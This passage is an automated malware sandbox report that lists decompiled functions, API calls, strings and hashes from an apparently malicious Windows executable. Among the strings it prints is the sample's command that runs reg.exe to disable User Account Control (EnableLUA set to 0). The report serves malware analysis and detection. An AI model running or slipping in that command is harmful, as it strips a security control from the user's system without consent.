                                • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                • _free.LIBCMT ref: 0044824C
                                • _free.LIBCMT ref: 00448274
                                • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                • _abort.LIBCMT ref: 00448293
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 966b63bd912de40b5b615a00da15e5d8939a9a4c78db0212e4922df61029cb32
                                • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                • Opcode Fuzzy Hash: 966b63bd912de40b5b615a00da15e5d8939a9a4c78db0212e4922df61029cb32
                                • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 881ec567a8ecab9b5ae46dea35bb7569396cf57d6f42af84948da6ead9762d9b
                                • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                • Opcode Fuzzy Hash: 881ec567a8ecab9b5ae46dea35bb7569396cf57d6f42af84948da6ead9762d9b
                                • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 88b0ec0b9de38ee72874faffadaad7a58cf941c8d18bd5a35ca229f780ffab3e
                                • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                • Opcode Fuzzy Hash: 88b0ec0b9de38ee72874faffadaad7a58cf941c8d18bd5a35ca229f780ffab3e
                                • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00442801 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PkGNG
                                • API String ID: 0-263838557
                                • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404CC3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404DD2
                                • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                • String ID: PkGNG
                                • API String ID: 3360349984-263838557
                                • Opcode ID: da9b55f167a3d17e97016713e4b8b3caaa4e9716ac3efc00888ec9c07983d3ee
                                • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                • Opcode Fuzzy Hash: da9b55f167a3d17e97016713e4b8b3caaa4e9716ac3efc00888ec9c07983d3ee
                                • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00443435 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\1m70ggeepT.exe,00000104), ref: 00443475
                                • _free.LIBCMT ref: 00443540
                                • _free.LIBCMT ref: 0044354A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$FileModuleName
                                • String ID: C:\Users\user\Desktop\1m70ggeepT.exe$`&v
                                • API String ID: 2506810119-3335843684
                                • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSizeSleep
                                • String ID: XQG
                                • API String ID: 1958988193-3606453820
                                • Opcode ID: 205b82dffe9b0f77f7c93e78d4092e9a7ef319f9f0d3ec4eb64b3aa0a1bff41f
                                • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                • Opcode Fuzzy Hash: 205b82dffe9b0f77f7c93e78d4092e9a7ef319f9f0d3ec4eb64b3aa0a1bff41f
                                • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                • GetLastError.KERNEL32 ref: 0041D580
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ClassCreateErrorLastRegisterWindow
                                • String ID: 0$MsgWindowClass
                                • API String ID: 2877667751-2410386613
                                • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                • CloseHandle.KERNEL32(?), ref: 004077AA
                                • CloseHandle.KERNEL32(?), ref: 004077AF
                                Strings
                                • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreateProcess
                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                • API String ID: 2922976086-4183131282
                                • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                • SetEvent.KERNEL32(?), ref: 0040512C
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                • CloseHandle.KERNEL32(?), ref: 00405140
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                • String ID: KeepAlive | Disabled
                                • API String ID: 2993684571-305739064
                                • Opcode ID: c594fc0502ac089e8ceed4a366586e120d9a374f389bb2b837d8f1f373a196b1
                                • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                • Opcode Fuzzy Hash: c594fc0502ac089e8ceed4a366586e120d9a374f389bb2b837d8f1f373a196b1
                                • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                • Sleep.KERNEL32(00002710), ref: 0041AE07
                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                • String ID: Alarm triggered
                                • API String ID: 614609389-2816303416
                                • Opcode ID: 2f63ca3754ee2fa8067f4581fa5685451e0165abe6878d0f9dceb9a842065b81
                                • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                • Opcode Fuzzy Hash: 2f63ca3754ee2fa8067f4581fa5685451e0165abe6878d0f9dceb9a842065b81
                                • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                Strings
                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                • API String ID: 3024135584-2418719853
                                • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                • Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                • _free.LIBCMT ref: 00444E06
                                • _free.LIBCMT ref: 00444E1D
                                • _free.LIBCMT ref: 00444E3C
                                • _free.LIBCMT ref: 00444E57
                                • _free.LIBCMT ref: 00444E6E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$AllocateHeap
                                • String ID:
                                • API String ID: 3033488037-0
                                • Opcode ID: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
